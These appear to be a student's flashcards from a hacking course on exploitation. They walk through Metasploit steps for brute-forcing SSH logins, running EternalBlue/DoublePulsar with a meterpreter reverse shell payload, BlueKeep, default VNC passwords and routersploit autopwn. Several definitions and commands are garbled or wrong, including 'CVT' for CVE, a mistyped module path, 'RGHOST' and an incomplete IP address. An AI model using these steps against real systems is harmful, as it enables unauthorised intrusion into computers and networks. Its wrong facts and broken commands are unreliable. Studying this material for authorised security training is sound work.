Hacking - Section 8 - Exploitation and Gaining Access. Flashcards
What is exploitation?
Is to use the vulnerabilities found to send a payload (a program) to the target.
What does the payload allows you to do?
Write commands directly into the target machine.
What happens if the target doesn’t have any vulnerabilities?
You need to make them open a payload by themselves, by using emails, files, etc.
What is a vulnerability?
Can be when a code of a software was not well written, which can be exploited by a the use of a bug in order to make it function differently (payload).
What is a CVT and a zero day vulnerability?
CVT + a year / when it first occurred is a bug exploited vulnerability.
zero day is a vulnerab that has not been patched yet (not discovered).
What is a shell?
Explain its two types:
shell = payload
reverse shell - target machine trying to connect back to the kali linux, exploit the target and drop a shell, which will tell the target machine to connect to our port.
bind shell - target machine opens their port for us to connect, but almost never work because firewalls can forbid target machines to open ports.
How to open the metasploitable framkework list?
cd /usr/share/metasploitable-framework/
How to open a metasploitable framkework file to see its code?
nano + name of it.
in the directory that they are
How to open the msfconsole?
msfconsole
How to show any section inside the msfconsole?
show + section you want
How to show a section inside of msfconsole?
type: show + name of the section
ex - show payloads
How to use a module?
use + section name + name of it
ex - use exploit/ + name you’ve copied
After using a module, how can you know more about it?
show info
show options
Inside the ‘show options’ command, if you want to change any info you can type:
set + name of option + new info
ex - set LHOST 192.168.7
Inside the ‘module’, to show the payloads that will work for that command you can type:
And how to set a new payload?
show payloads
copy the one you desire (show payloads) and type:
set payload + its name
show options
How to show the available targets inside the module?
and how to set one?
show targets
set target + number (then use exploit)
How can you use a version explored in the searchsploit on the msfconsole?
If you find a path result with metasploit in it, you can use:
search + name of the version (on the msfconsole)
How to exit the shell?
exit
What is the ‘netcat’ tool and how to use it?
A tool that allows us to to establish a connection with other machines using TCP/UDP.
nc -h
nc + IP + Port Nº
What are some rare exploits that barely happen but are guaranteed to exploy?
Bindshell and Tellnet.
How to exploit a telnet?
telnet + IP
How to run the commands on the msfconsole?
run
How to search for a version of a exploit?
searchsploit + its name
msfconsole
use + the name you saw +/port that u desire
use + same thing as above + /the version u choose from msfconsole
run
ex - use auxiliary/scanner/smb/
use auxiliary/scanner/smb/ + /version u desire
set RGHOST
run
What is a brute force attack?
Is to send information (usernames and passwords) to the target to check if any of those are correct.
Why is the brute force attack used?
To check if the target has default credentials or weak passwords (or both).
How to access ssh modules (msfconsole)
search ssh
How to set a password/username file to use in a brutal force attack?
nano PASSWORDS.txt (write passwords inside of it)
nano USERNAMES.txt (write usernames inside of it)
(go to desktop and type pwd)
set PASS_FILE pwd + /PASSWORDS.txt
set USER_FILE pwd + /USERNAMES.txt
set VERBOSE TRUE
set RHOSTS + IP
What does the command ‘session’ do?
and how to open (start) connection with one?
Will show you all the shells that you are connected.
sessions + -i + Nº of it
What does the -p- command on the nmap mean?
Means it’ll access all ports of the machine.
ex - sudo nmap -sV + IP + -p-
How to connect to a VNC port?
vncviewer + IP
password = password
What is the port 445 on windows?
A port that is always open, mainly on companies, because it is used to share files and data between the companies computers.
What does the ‘getuid’ command stands for on windows?
It will tell u the ‘account’ that u are positioned.
NT AUTHORITY\SYSTEM is the highest one.
How to show all the files including the hidden directories on a ls command?
ls -la
How to execute the eternalblue_doublepulsar on msfconsole?
use windows/sub/eternalblue_doublepulsar
processinject - lsass.exe (for 64x machines)
RHOSTS - target IP
targetarchitecture - 64x (for 64x machines)
payload - (windows/x64/meterpreter/reverse_tcp)
What is a RCE?
Remote code execution
meaning that the attacker does not have to authenticate in order to write codes on the machine.
What is the port that is frequently opened into big companies but not on home devices?
port 3389
What can you do to check if a target is vulnerable?
You can use an auxiliary module of the specific vulnerability that you intend to deploy.
How to use the bluekeep exploit?
search bluekeep
use it
set RHOSTS (need port 3389 opened)
What happens if you invade a router?
You’ll get access to the whole network.
Why are routers the easiest devices to hack?
Because most of them (home routers) have default login passwords.
How to open the ‘routersploit’ command?
rsf.py
What does the /autopwn scan do?
It scans the router for several vulnerabilities and see if any of them are exploitable.
